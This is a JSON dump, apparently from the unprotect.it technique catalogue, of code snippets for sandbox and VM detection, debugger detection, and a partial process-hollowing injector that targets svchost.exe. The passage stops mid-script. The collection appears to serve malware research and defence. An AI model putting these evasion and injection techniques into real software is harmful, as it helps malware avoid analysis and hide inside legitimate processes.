            "plain_code": "#include <iostream>\r\n#include <windows.h>\r\n\r\nusing namespace std;\r\n\r\n\r\nBOOL FileExists(TCHAR* szPath)\r\n{\r\n\tDWORD dwAttrib = GetFileAttributes(szPath);\r\n\treturn (dwAttrib != INVALID_FILE_ATTRIBUTES) && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY);\r\n}\r\n\r\n// Check if file related to sandbox exist\r\nint CheckFile()\r\n{\r\n    bool hAppend;\r\n    LPSTR fname[] = {\"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\agent.pyw\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\vmmouse.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\vmhgfs.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxMouse.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxGuest.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxSF.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxVideo.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxdisp.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxhook.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxmrxnp.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxogl.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglarrayspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglcrutil.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglerrorspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglfeedbackspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglpackspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglpassthroughspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxservice.exe\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxtray.exe\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\VBoxControl.exe\",\r\n                     // ADD YOUR FILE HERE!\r\n                    };\r\n\r\n    for (int i = 0; i < (sizeof(fname) / sizeof(LPSTR)); i++)\r\n    {\r\n\r\n        if (FileExists(fname[i]))\r\n            cout << \" [+] File exist: \" << (fname[i]) << endl;\r\n\t\telse\r\n            cout << \" [-] File doesn't exist: \" << (fname[i]) << endl;\r\n\r\n    }\r\n\r\n    return 0;\r\n}\r\n\r\n\r\nint main()\r\n{\r\n    CheckFile();\r\n    return 0;\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/1/",
            "author": "https://search.unprotect.it/api/snippet_authors/1/",
            "technique": "https://search.unprotect.it/api/techniques/67/",
            "description": "You can build this snippet as a classic Delphi Console Application and add your own signatures for detecting debuggers and related tools.",
            "plain_code": "program FindWindowAPI;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n  System.SysUtils, WinAPI.Windows, Generics.Collections, psAPI;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  TFindWindowSignature Class\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\ntype\r\n  TFindWindowSignature = class\r\n  private\r\n    FDescription : String;\r\n    FClassName   : String;\r\n    FWindowName  : String;\r\n  public\r\n    {@C}\r\n    constructor Create(ADescription, AClassName, AWindowName : String);\r\n\r\n    {@G}\r\n    property Description : String read FDescription;\r\n    property ClassName   : String read FClassName;\r\n    property WindowName  : String read FWindowName;\r\n  end;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___constructor\r\n-------------------------------------------------------------------------------}\r\nconstructor TFindWindowSignature.Create(ADescription, AClassName, AWindowName : String);\r\nbegin\r\n  FDescription := ADescription;\r\n  FClassName   := AClassName;\r\n  FWindowName  := AWindowName;\r\nend;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Main\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\nvar LFindWindowSignatures  : TObjectList<TFindWindowSignature>;\r\n    LEnumWindowsSignatures : TDictionary<String, String>;\r\n\r\n{-------------------------------------------------------------------------------\r\n  When a Window handle is found it will output to console several information\r\n  about spotted process.\r\n-------------------------------------------------------------------------------}\r\nprocedure Found(ADescription : String; AHandle : THandle);\r\nconst CRLF = #13#10;\r\n\r\nvar AStdout_TXT    : String;\r\n    AProcessId     : Cardinal;\r\n    AProcessHandle : THandle;\r\n    ARet           : DWORD;\r\n    pImagePath     : PWideChar;\r\nbegin\r\n  try\r\n      AStdout_TXT := AStdout_TXT + StringOfChar('-', 60) + CRLF;\r\n      AStdout_TXT := AStdout_TXT + ADescription + CRLF;\r\n      AStdout_TXT := AStdout_TXT + StringOfChar('-', 60) + CRLF;\r\n\r\n      AStdout_TXT := AStdout_TXT + Format('Handle: %d%s', [AHandle, CRLF]);\r\n\r\n      GetWindowThreadProcessId(AHandle, @AProcessId);\r\n\r\n      if (AProcessId > 0) then begin\r\n        AProcessHandle := OpenProcess(\r\n                                        (PROCESS_QUERY_INFORMATION or PROCESS_VM_READ),\r\n                                        False,\r\n                                        AProcessId\r\n        );\r\n\r\n        if (AProcessHandle > 0) then begin\r\n          AStdout_TXT := AStdout_TXT + Format('Process Id: %d%s', [AProcessId, CRLF]);\r\n\r\n          pImagePath := nil;\r\n          try\r\n              GetMem(pImagePath, (MAX_PATH * 2));\r\n              ARet := GetModuleFileNameExW(AProcessHandle, 0, pImagePath, (MAX_PATH * 2));\r\n              if (ARet > 0) then begin\r\n                AStdout_TXT := AStdout_TXT + Format('Process Name: %s%s', [ExtractFileName(String(pImagePath)), CRLF]);\r\n                AStdout_TXT := AStdout_TXT + Format('Image Path: %s%s', [ExtractFilePath(String(pImagePath)), CRLF]);\r\n              end;\r\n          finally\r\n            if Assigned(pImagePath) and (ARet > 0) then\r\n              FreeMem(pImagePath, ARet);\r\n          end;\r\n        end;\r\n      end;\r\n\r\n      AStdout_TXT := AStdout_TXT + StringOfChar('-', 60) + CRLF + CRLF;\r\n\r\n      ///\r\n  finally\r\n    WriteLn(AStdout_TXT);\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Find Debuggers by Window Name or Class Name using FindWindow API\r\n-------------------------------------------------------------------------------}\r\nfunction Locate_FindWindow() : Boolean;\r\nvar AFindWindowSignature : TFindWindowSignature;\r\n    i                    : Integer;\r\n    pClassName           : Pointer;\r\n    pWindowName          : Pointer;\r\n    AHandle              : THandle;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  for i := 0 to LFindWindowSignatures.Count -1 do begin\r\n    AFindWindowSignature := LFindWindowSignatures.Items[i];\r\n    if NOT Assigned(AFindWindowSignature) then\r\n      continue;\r\n    ///\r\n\r\n    pClassName  := nil;\r\n    pWindowName := nil;\r\n\r\n    if NOT AFindWindowSignature.ClassName.isEmpty then\r\n      pClassName := PWideChar(AFindWindowSignature.ClassName);\r\n\r\n    if NOT AFindWindowSignature.WIndowName.isEmpty then\r\n      pWindowName := PWideChar(AFindWindowSignature.WindowName);\r\n\r\n    AHandle := FindWindowW(pClassName, pWindowName);\r\n    if (AHandle > 0) then begin\r\n      Found(AFindWindowSignature.Description, AHandle);\r\n\r\n      ///\r\n      result := True;\r\n    end;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Find Debuggers by Window Name (via Window Name Pattern) using EnumWindows API\r\n-------------------------------------------------------------------------------}\r\nfunction EnumWindowProc(AHandle : THandle; AParam : LPARAM) : BOOL; stdcall;\r\nvar AMaxCount   : Integer;\r\n    AWindowName : String;\r\n    AOldLen     : Cardinal;\r\n    APattern    : String;\r\n    AKey        : String;\r\nbegin\r\n  result := True;\r\n  ///\r\n\r\n  if (AHandle = 0) then\r\n    Exit();\r\n  ///\r\n\r\n  AMaxCount := GetWindowTextLength(AHandle) + 1;\r\n  if (AMaxCount = 0) then\r\n    Exit();\r\n\r\n  SetLength(AWindowName, AMaxCount); // Other technique instead of using GetMem / FreeMem a new Pointer.\r\n  try\r\n      if (GetWindowTextW(AHandle, PWideChar(AWindowName), AMaxCount) = 0) then\r\n        Exit();\r\n      ///\r\n\r\n      AOldLen := Length(AWindowName);\r\n\r\n      for AKey {Description} in LEnumWindowsSignatures.keys do begin\r\n        if NOT LEnumWindowsSignatures.TryGetValue(AKey, APattern) then\r\n          continue;\r\n\r\n        AWindowName := StringReplace(AWindowName, APattern, '', []);\r\n\r\n        if (Length(AWindowName) <> AOldLen) then begin\r\n          Found(AKey, AHandle);\r\n\r\n          break;\r\n        end;\r\n      end;\r\n  finally\r\n    SetLength(AWindowName, 0);\r\n  end;\r\nend;\r\n\r\nfunction Locate_EnumWindows() : Boolean;\r\nbegin\r\n  EnumWindows(@EnumWindowProc, 0);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Append FindWindow Technique Signature\r\n-------------------------------------------------------------------------------}\r\nprocedure AppendFindWindowSignature(ADescription, AClassName, AWindowName : String);\r\nvar AFindWindowSignature : TFindWindowSignature;\r\nbegin\r\n  if NOT Assigned(LFindWindowSignatures) then\r\n    Exit();\r\n  ///\r\n\r\n  AFindWindowSignature := TFindWindowSignature.Create(ADescription, AClassName, AWindowName);\r\n\r\n  LFindWindowSignatures.Add(AFindWindowSignature);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___entry\r\n-------------------------------------------------------------------------------}\r\nbegin\r\n  try\r\n    LFindWindowSignatures := TObjectList<TFindWindowSignature>.Create();\r\n    LEnumWindowsSignatures := TDictionary<String, String>.Create();\r\n    try\r\n      {\r\n        Configure debuggers signatures here for FindWindow API technique.\r\n      }\r\n      AppendFindWindowSignature('OllyDbg', 'OLLYDBG', '');\r\n      AppendFindWindowSignature('x64dbg (x64)', '', 'x64dbg');\r\n      AppendFindWindowSignature('x32dbg (x32)', '', 'x32dbg');\r\n\r\n      // ...\r\n      // AppendFindWindowSignature('...', '...', '...');\r\n      // ...\r\n\r\n      {\r\n        Configure debuggeers signatures here for EnumWindows API technique.\r\n      }\r\n      LEnumWindowsSignatures.Add('Immunity Debugger', 'Immunity Debugger');\r\n\r\n      // ...\r\n      // AEnumWindowsSignatures.Add('...', '...');\r\n      // ...\r\n\r\n      {\r\n        Fire !!!\r\n      }\r\n      Locate_FindWindow();\r\n      Locate_EnumWindows();\r\n\r\n      readln;\r\n    finally\r\n      if Assigned(LFindWindowSignatures) then\r\n        FreeAndNil(LFindWindowSignatures);\r\n\r\n      if Assigned(LEnumWindowsSignatures) then\r\n        FreeAndNil(LEnumWindowsSignatures);\r\n    end;\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\n\r\nend."
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/19/",
            "description": "",
            "plain_code": "#include <iostream>\r\n\r\nusing namespace std;\r\n\r\nvoid smsw()\r\n{\r\n\tunsigned int reax = 0;\r\n\r\n\t__asm\r\n\t{\r\n\t\tmov eax, 0xCCCCCCCC\r\n\t\tsmsw eax\r\n\t\tmov DWORD PTR[reax], eax\r\n\t}\r\n\r\n\tif ((((reax >> 24) & 0xFF) == 0xcc) && (((reax >> 16) & 0xFF) == 0xcc))\r\n\t{\r\n\t    cout << \"VM detected!\" << endl;\r\n\t}\r\n}\r\n\r\nint main()\r\n{\r\n    smsw();\r\n    cout << \"Hello world!\" << endl;\r\n    return 0;\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/3/",
            "technique": "https://search.unprotect.it/api/techniques/7/",
            "description": "Source: https://gist.github.com/kooroshh/e4a303368555ea57f04f87e5630147b5",
            "plain_code": "void CheckVM(void)\r\n{\r\n\tunsigned int    a, b;\r\n\r\n\t__try {\r\n\t\t__asm {\r\n\r\n\t\t\t// save register values on the stack\r\n\t\t\tpush eax\r\n\t\t\tpush ebx\r\n\t\t\tpush ecx\r\n\t\t\tpush edx\r\n\r\n\t\t\t// perform fingerprint\r\n\t\t\tmov eax, 'VMXh' // VMware magic value (0x564D5868)\r\n\t\t\tmov ecx, 0Ah // special version cmd (0x0a)\r\n\t\t\tmov dx, 'VX' // special VMware I/O port (0x5658)\r\n\r\n\t\t\tin eax, dx // special I/O cmd\r\n\r\n\t\t\tmov a, ebx // data \r\n\t\t\tmov b, ecx // data (eax gets also modified\r\n\r\n\t\t\t// restore register values from the stack\r\n\t\t\tpop edx\r\n\t\t\tpop ecx\r\n\t\t\tpop ebx\r\n\t\t\tpop eax\r\n\t\t}\r\n\t}\r\n\t__except (EXCEPTION_EXECUTE_HANDLER) {}\r\n\r\n\tif (a == 'VMXh') { // is the value equal to the VMware magic value?\r\n\t\tprintf(\"Result  : VMware detected\\nVersion : \");\r\n\t\tif (b == 1)\r\n\t\t\tprintf(\"Express\\n\\n\");\r\n\t\telse if (b == 2)\r\n\t\t\tprintf(\"ESX\\n\\n\");\r\n\t\telse if (b == 3)\r\n\t\t\tprintf(\"GSX\\n\\n\");\r\n\t\telse if (b == 4)\r\n\t\t\tprintf(\"Workstation\\n\\n\");\r\n\t\telse\r\n\t\t\tprintf(\"unknown version\\n\\n\");\r\n\t}\r\n\telse\r\n\t\tprintf(\"Result  : Not Detected\\n\\n\");\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/3/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/34/",
            "description": "Python snippet to detect the drive size with `GetDiskFreeSpaceExW`",
            "plain_code": "import ctypes\r\nimport math\r\n\r\n# Convert octets\r\ndef convert_size(size_bytes):\r\n    if size_bytes == 0:\r\n        return \"0B\"\r\n    size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\r\n    i = int(math.floor(math.log(size_bytes, 1024)))\r\n    p = math.pow(1024, i)\r\n    s = round(size_bytes / p, 2)\r\n    return \"%s %s\" % (s, size_name[i])\r\n\r\n\r\n# Get disk size with API GetDiskFreeSpaceExW\r\ndef disk_size(path):\r\n    PULARGE_INTEGER = ctypes.POINTER(ctypes.c_ulonglong)\r\n    kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)\r\n    kernel32.GetDiskFreeSpaceExW.argtypes = (ctypes.c_wchar_p,) + (PULARGE_INTEGER,) * 3\r\n\r\n    _, total, free = ctypes.c_ulonglong(), ctypes.c_ulonglong(), ctypes.c_ulonglong()\r\n    success = kernel32.GetDiskFreeSpaceExW(path, ctypes.byref(_), ctypes.byref(total), ctypes.byref(free))\r\n    size = convert_size(total.value)\r\n    print \"The size of the disk is: \", size\r\n\r\n\r\nif __name__ == '__main__':\r\n    disk_size(\"C:/\")"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/12/",
            "description": "This is a snippet to detect most common registry keys created by virtual machines.",
            "plain_code": "#include <iostream>\r\n#include<Windows.h>\r\n#include<stdio.h>\r\n\r\nusing namespace std;\r\n\r\nint reg_value_exist(HKEY hKey, char * regkey_s, char * value_s, char * lookup) {\r\n\tHKEY regkey;\r\n\tLONG ret;\r\n\tDWORD size;\r\n\tchar value[1024];\r\n\r\n\r\n\tif (RegOpenKeyEx(hKey, regkey_s, 0, KEY_READ, &regkey))\r\n    {\r\n        if (RegQueryValueEx(regkey, value_s, NULL, NULL, (BYTE*)value, &size))\r\n        {\r\n            cout << \" [-] Reg value doesn't exist: \" << (regkey) << endl;\r\n        }\r\n        else\r\n        {\r\n            cout << \" [*] Reg value exist: \" << (value) << endl;\r\n        }\r\n\t}\r\n\r\n    else\r\n    {\r\n        if (RegQueryValueEx(regkey, value_s, NULL, NULL, (BYTE*)value, &size))\r\n        {\r\n            cout << \" [-] Reg value doesn't exist: \" << (regkey) << endl;\r\n        }\r\n        else\r\n        {\r\n            cout << \" [*] Reg value exist: \" << (value) << endl;\r\n        }\r\n    }\r\n}\r\n\r\nint RegistryArtifacts()\r\n{\r\n    HKEY hKey;\r\n\r\n    // list of registry key related virutal machines\r\n    LPCTSTR RegValuePath[] = { \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n                               \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 1\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n                               \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 2\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n                               \"SOFTWARE\\\\VMware, Inc.\\\\VMware Tools\",\r\n                               \"HARDWARE\\\\Description\\\\System\",\r\n                               \"SOFTWARE\\\\Oracle\\\\VirtualBox Guest Additions\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\Disk\\\\Enum\",\r\n                               \"HARDWARE\\\\ACPI\\\\DSDT\\\\VBOX__\",\r\n                               \"HARDWARE\\\\ACPI\\\\FADT\\\\VBOX__\",\r\n                               \"HARDWARE\\\\ACPI\\\\RSDT\\\\VBOX__\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxGuest\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxMouse\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxService\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxSF\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxVideo\",\r\n                               };\r\n\r\n\r\n    for (int i = 0; i < (sizeof(RegValuePath) / sizeof(LPCWSTR)); i++)\r\n    {\r\n\r\n        if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, RegValuePath[i], 0, KEY_READ, &hKey))\r\n        {\r\n            cout << \" [-] Reg key doesn't exist: \" << (RegValuePath[i]) << endl;\r\n        }\r\n        else\r\n        {\r\n            cout << \" [*] Reg key exist: \" << (RegValuePath[i]) << endl;\r\n        }\r\n\r\n    }\r\n\r\n    // Check for registry Value\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 1\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 2\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VBOX\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"SystemBiosVersion\", \"VBOX\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"VideoBiosVersion\", \"VIRTUALBOX\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DESCRIPTION\\\\System\", \"SystemBiosDate\", \"06/23/99\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"QEMU\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"SystemBiosVersion\", \"QEMU\");\r\n}\r\n\r\nint main()\r\n{\r\n    RegistryArtifacts();\r\n    return 0;\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/3/",
            "author": "https://search.unprotect.it/api/snippet_authors/1/",
            "technique": "https://search.unprotect.it/api/techniques/67/",
            "description": "Feel free to edit both `fw_debuggers` and `contains_in_title` to extend the search of known debuggers.",
            "plain_code": "import ctypes\r\nimport os\r\n\r\nfrom ctypes.wintypes import BOOL, HWND, LPARAM,\\\r\n                            LPWSTR, INT, MAX_PATH,\\\r\n                            LPDWORD, DWORD, HANDLE,\\\r\n                            HMODULE\r\n\r\n\r\ndef found(description, hwnd):\r\n    \"\"\"\r\n    When a Window handle is found it will output to console several information about spotted process.\r\n    :param description: Description of found object.\r\n    :param hwnd: Handle of found object.\r\n    \"\"\"\r\n    lpdwProcessId = ctypes.c_ulong()\r\n\r\n    output = \"-\" * 60 + \"\\r\\n\"\r\n    output += description + \"\\r\\n\"\r\n    output += \"-\" * 60 + \"\\r\\n\"\r\n\r\n    output += f\"Handle: {hwnd}\\r\\n\"\r\n\r\n    _GetWindowThreadProcessId(hwnd, ctypes.byref(lpdwProcessId))\r\n\r\n    if (lpdwProcessId is not None) and (lpdwProcessId.value > 0):\r\n        PROCESS_QUERY_INFORMATION = 0x0400\r\n        PROCESS_VM_READ = 0x0010\r\n\r\n        procHandle = ctypes.windll.kernel32.OpenProcess(\r\n            PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,\r\n            False,\r\n            lpdwProcessId.value\r\n        )\r\n\r\n        if procHandle > 0:\r\n            output += f\"Process Id: {lpdwProcessId.value}\\r\\n\"\r\n\r\n            lpFilename = ctypes.create_unicode_buffer(MAX_PATH)\r\n\r\n            if _GetModuleFileNameEx(procHandle, 0, lpFilename, MAX_PATH) > 0:\r\n                path, process_name = os.path.split(lpFilename.value)\r\n\r\n                output += f\"Process Name: {process_name}\\r\\n\"\r\n                output += f\"Image Path: {path}\\r\\n\"\r\n\r\n            ctypes.windll.kernel32.CloseHandle(procHandle)\r\n\r\n    output += \"-\" * 60 + \"\\r\\n\\r\\n\"\r\n\r\n    print(output)\r\n\r\n\r\ndef enum_window_proc(hwnd, lparam):\r\n    \"\"\"\r\n    EnumWindows API CallBack\r\n    :param hwnd: Current Window Handle\r\n    :param lparam: Not used in our case\r\n    :return: Always True in our case\r\n    \"\"\"\r\n    if hwnd > 0:\r\n        nMaxCount = ctypes.windll.user32.GetWindowTextLengthW(hwnd)+1\r\n\r\n        if nMaxCount > 0:\r\n            lpWindowName = ctypes.create_unicode_buffer(nMaxCount)\r\n\r\n            if _GetWindowText(hwnd, lpWindowName, nMaxCount) > 0:\r\n                for description, in_title in contains_in_title:\r\n                    if in_title in lpWindowName.value:\r\n                        found(description, hwnd)\r\n\r\n    return True\r\n\r\n\r\nif __name__ == '__main__':\r\n    '''\r\n        Description | Window Class Name (lpClassName) | Window Title (lpWindowName)\r\n    '''\r\n    fw_debuggers = [\r\n        (\"OllyDbg\", \"OLLYDBG\", None),\r\n        (\"x64dbg (x64)\", None, \"x64dbg\"),\r\n        (\"x32dbg (x32)\", None, \"x32dbg\"),\r\n        # ......... #\r\n    ]\r\n\r\n    '''\r\n        Description | Text contained in debugger title.\r\n    '''\r\n    contains_in_title = [\r\n        (\"Immunity Debugger\", \"Immunity Debugger\"),\r\n        # ......... #\r\n    ]\r\n\r\n    # Define GetWindowThreadProcessId API\r\n    _GetWindowThreadProcessId = ctypes.windll.user32.GetWindowThreadProcessId\r\n\r\n    _GetWindowThreadProcessId.argtypes = HWND, LPDWORD\r\n    _GetWindowThreadProcessId.restype = DWORD\r\n\r\n    # Define GetModuleFileNameEx API\r\n    _GetModuleFileNameEx = ctypes.windll.psapi.GetModuleFileNameExW\r\n    _GetModuleFileNameEx.argtypes = HANDLE, HMODULE, LPWSTR, DWORD\r\n    _GetModuleFileNameEx.restype = DWORD\r\n\r\n    '''\r\n        Search for Debuggers using the FindWindowW API with ClassName /+ WindowName\r\n    '''\r\n    for description, lpClassName, lpWindowName in fw_debuggers:\r\n        handle = ctypes.windll.user32.FindWindowW(lpClassName, lpWindowName)\r\n\r\n        if handle > 0:\r\n            found(description, handle)\r\n\r\n    '''\r\n        Search for Debuggers using EnumWindows API.\r\n        We first list all Windows titles then search for a debugger title pattern.\r\n        This is useful against debuggers or tools without specific title / classname. \r\n    '''\r\n\r\n    # Define EnumWindows API\r\n    lpEnumFunc = ctypes.WINFUNCTYPE(\r\n        BOOL,\r\n        HWND,\r\n        LPARAM\r\n    )\r\n\r\n    _EnumWindows = ctypes.windll.user32.EnumWindows\r\n\r\n    _EnumWindows.argtypes = [\r\n        lpEnumFunc,\r\n        LPARAM\r\n    ]\r\n\r\n    # Define GetWindowTextW API\r\n    _GetWindowText = ctypes.windll.user32.GetWindowTextW\r\n\r\n    _GetWindowText.argtypes = HWND, LPWSTR, INT\r\n    _GetWindowText.restype = INT\r\n\r\n    # Enumerate Windows through Windows API\r\n    _EnumWindows(lpEnumFunc(enum_window_proc), 0)"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/3/",
            "author": "https://search.unprotect.it/api/snippet_authors/3/",
            "technique": "https://search.unprotect.it/api/techniques/88/",
            "description": "",
            "plain_code": "# Source: https://github.com/joren485/HollowProcess\r\nfrom ctypes import *\r\nfrom pefile import PE\r\nimport sys\r\n\r\nif len(sys.argv) != 3:\r\n        print \"Example: runpe.py test.exe C:\\windows\\system32\\svchost.exe\"\r\n        sys.exit()\r\n\r\n\r\npayload_exe = sys.argv[1]\r\ntarget_exe = sys.argv[2]\r\nstepcount = 1\r\n\r\n\r\nclass PROCESS_INFORMATION(Structure):\r\n\t_fields_ = [\r\n                ('hProcess', c_void_p), \r\n                ('hThread', c_void_p), \r\n                ('dwProcessId', c_ulong), \r\n                ('dwThreadId', c_ulong)]\r\n\t\r\nclass STARTUPINFO(Structure):\r\n\t_fields_ = [\r\n                ('cb', c_ulong), \r\n                ('lpReserved', c_char_p),    \r\n                ('lpDesktop', c_char_p),\r\n                ('lpTitle', c_char_p),\r\n                ('dwX', c_ulong),\r\n                ('dwY', c_ulong),\r\n                ('dwXSize', c_ulong),\r\n                ('dwYSize', c_ulong),\r\n                ('dwXCountChars', c_ulong),\r\n                ('dwYCountChars', c_ulong),\r\n                ('dwFillAttribute', c_ulong),\r\n                ('dwFlags', c_ulong),\r\n                ('wShowWindow', c_ushort),\r\n                ('cbReserved2', c_ushort),\r\n                ('lpReserved2', c_ulong),    \r\n                ('hStdInput', c_void_p),\r\n                ('hStdOutput', c_void_p),\r\n                ('hStdError', c_void_p)]\r\n\t\r\nclass FLOATING_SAVE_AREA(Structure):\r\n\t_fields_ = [\r\n                (\"ControlWord\", c_ulong),\r\n                (\"StatusWord\", c_ulong),\r\n                (\"TagWord\", c_ulong),\r\n                (\"ErrorOffset\", c_ulong),\r\n                (\"ErrorSelector\", c_ulong),\r\n                (\"DataOffset\", c_ulong),\r\n                (\"DataSelector\", c_ulong),\r\n                (\"RegisterArea\", c_ubyte * 80),\r\n                (\"Cr0NpxState\", c_ulong)]\t\r\n\t\r\nclass CONTEXT(Structure):\r\n        _fields_ = [\r\n                (\"ContextFlags\", c_ulong),\r\n                (\"Dr0\", c_ulong),\r\n                (\"Dr1\", c_ulong),\r\n                (\"Dr2\", c_ulong),\r\n                (\"Dr3\", c_ulong),\r\n                (\"Dr6\", c_ulong),\r\n                (\"Dr7\", c_ulong),\r\n                (\"FloatSave\", FLOATING_SAVE_AREA),\r\n                (\"SegGs\", c_ulong),\r\n                (\"SegFs\", c_ulong),\r\n                (\"SegEs\", c_ulong),\r\n                (\"SegDs\", c_ulong),\r\n                (\"Edi\", c_ulong),\r\n                (\"Esi\", c_ulong),\r\n                (\"Ebx\", c_ulong),\r\n                (\"Edx\", c_ulong),\r\n                (\"Ecx\", c_ulong),\r\n                (\"Eax\", c_ulong),\r\n                (\"Ebp\", c_ulong),\r\n                (\"Eip\", c_ulong),\r\n                (\"SegCs\", c_ulong),\r\n                (\"EFlags\", c_ulong),\r\n                (\"Esp\", c_ulong),\r\n                (\"SegSs\", c_ulong),\r\n                (\"ExtendedRegisters\", c_ubyte * 512)]\r\n\r\ndef error():\r\n        print \"[!]Error: \" + FormatError(GetLastError())\r\n        print \"[!]Exiting\"\r\n        print \"[!]The process may still be running\"\r\n        sys.exit()\r\n        \r\n\r\nprint \"[\" + str(stepcount) +\"]Creating Suspended Process\"\r\nstepcount += 1\r\n\r\nstartupinfo = STARTUPINFO()\r\nstartupinfo.cb = sizeof(STARTUPINFO)\r\nprocessinfo = PROCESS_INFORMATION()\r\n\r\nCREATE_SUSPENDED = 0x0004\r\nif windll.kernel32.CreateProcessA(\r\n                                None,\r\n                                target_exe,\r\n                                None,\r\n                                None,\r\n                                False,\r\n                                CREATE_SUSPENDED,\r\n                                None,\r\n                                None,\r\n                                byref(startupinfo),\r\n                                byref(processinfo)) == 0:\r\n       error()\r\n        \r\n\r\nhProcess = processinfo.hProcess\r\nhThread = processinfo.hThread\r\n\r\n\r\nprint \"\\t[+]Successfully created suspended process! PID: \" + str(processinfo.dwProcessId)\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Reading 